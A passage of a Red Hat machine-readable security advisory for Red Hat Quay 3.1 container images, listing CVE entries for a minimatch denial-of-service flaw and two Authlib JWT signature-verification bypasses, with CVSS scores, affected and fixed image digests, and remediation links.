"summary": "https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74",
"url": "https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74"
}
],
"release_date": "2026-02-26T01:07:42.693000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-24T18:02:58+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5665"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions"
},
{
"cve": "CVE-2026-27962",
"cwe": {
"id": "CWE-347",
"name": "Improper Verification of Cryptographic Signature"
},
"discovery_date": "2026-03-16T18:02:07.041902+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2448164"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Authlib, a Python library used for creating secure authentication and authorization systems. This vulnerability, known as JWK (JSON Web Key) Header Injection, affects how Authlib verifies digital signatures in JWS (JSON Web Signature) tokens. An attacker can exploit this by creating a specially crafted token that includes their own cryptographic key in the header. When the system attempts to verify this token without a predefined key, it mistakenly uses the attacker\u0027s key, allowing them to bypass authentication and gain unauthorized access.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "authlib: Authlib: Authentication bypass due to JWK Header Injection vulnerability",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This critical vulnerability in Authlib\u0027s JWS implementation allows unauthenticated attackers to forge JWTs by embedding their own cryptographic key in the token header. Impact is high to confidentiality and integrity as attackers can bypass authentication.\n\nThe impact for Red Hat Quay is rated as low because it imports authlib solely as a JWK parsing utility and performs all JWT signature verification through PyJWT, so the vulnerable jws.deserialize_compact() code path is never called.\n\nRed Hat OpenShift AI is not affected, since authlib is only present as a transitive dependency in the dev dependency group and is not included in production image builds, so the vulnerable code is not present in the shipped product.\n\nRed Hat Satellite is not affected, as authlib is only present as a dependency of fastmcp. In Satellite, fastmcp only invokes authlib using jwt.decode() which isn\u0027t able to reach the vulnerability condition even with key=none.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
],
"known_not_affected": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-27962"
},
{
"category": "external",
"summary": "RHBZ#2448164",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448164"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-27962",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27962"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-27962",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27962"
},
{
"category": "external",
"summary": "https://github.com/authlib/authlib/commit/a5d4b2d4c9e46bfa11c82f85fdc2bcc0b50ae681",
"url": "https://github.com/authlib/authlib/commit/a5d4b2d4c9e46bfa11c82f85fdc2bcc0b50ae681"
},
{
"category": "external",
"summary": "https://github.com/authlib/authlib/releases/tag/v1.6.9",
"url": "https://github.com/authlib/authlib/releases/tag/v1.6.9"
},
{
"category": "external",
"summary": "https://github.com/authlib/authlib/security/advisories/GHSA-wvwj-cvrp-7pv5",
"url": "https://github.com/authlib/authlib/security/advisories/GHSA-wvwj-cvrp-7pv5"
}
],
"release_date": "2026-03-16T17:34:38.946000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-24T18:02:58+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5665"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Low"
}
],
"title": "authlib: Authlib: Authentication bypass due to JWK Header Injection vulnerability"
},
{
"cve": "CVE-2026-28802",
"cwe": {
"id": "CWE-347",
"name": "Improper Verification of Cryptographic Signature"
},
"discovery_date": "2026-03-06T07:01:49.366979+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2445120"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Authlib, a Python library for building OAuth and OpenID Connect servers. A remote attacker can exploit this vulnerability by crafting a malicious JSON Web Token (JWT) with a \"none\" algorithm and an empty signature. This bypasses the expected signature verification, potentially allowing the attacker to forge tokens and gain unauthorized access or perform unauthorized actions within applications using Authlib.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "authlib: Authlib: Signature verification bypass via malicious JWT allows unauthorized access",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
],
"known_not_affected": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64"
]
},
"references": [
